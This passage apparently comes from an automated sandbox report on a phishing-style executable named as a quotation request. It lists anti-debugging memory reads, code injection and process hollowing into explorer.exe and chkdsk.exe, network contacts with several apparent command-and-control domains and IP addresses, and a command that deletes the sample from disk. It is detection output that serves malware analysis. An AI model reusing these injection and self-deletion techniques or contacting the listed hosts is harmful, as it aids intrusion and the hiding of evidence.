          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C23D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BFA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B97D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C48D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C48ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B88794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C48F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C33D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 100.24.208.97 80
          Source: C:\Windows\explorer.exeDomain query: www.venturivasiljevic.com
          Source: C:\Windows\explorer.exeDomain query: www.lippocaritahotel.com
          Source: C:\Windows\explorer.exeDomain query: www.jiltedowl.com
          Source: C:\Windows\explorer.exeDomain query: www.influenced-brands.com
          Source: C:\Windows\explorer.exeDomain query: www.vicdux.life
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.193.107 80
          Source: C:\Windows\explorer.exeDomain query: www.themiamadison.com
          Source: C:\Windows\explorer.exeDomain query: www.top1opp.com
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.65.245 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.28.148.178 80
          Source: C:\Windows\explorer.exeDomain query: www.slingshotart.com
          Source: C:\Windows\explorer.exeDomain query: www.yorkshirebridalmakeup.info
          Source: C:\Windows\explorer.exeDomain query: www.sitedesing.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.216.127.214 80
          Source: C:\Windows\explorer.exeDomain query: www.helpushelpothersstore.com
          Source: C:\Windows\explorer.exeDomain query: www.saddletaxweigh.info
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection loaded: unknown target: C:\Users\user\Desktop\RFQ-BCM 03122020.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 200000
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess created: C:\Users\user\Desktop\RFQ-BCM 03122020.exe 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: explorer.exe, 00000004.00000000.269921839.0000000005EA0000.00000004.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.260542390.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.260542390.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.287343246.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.260542390.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
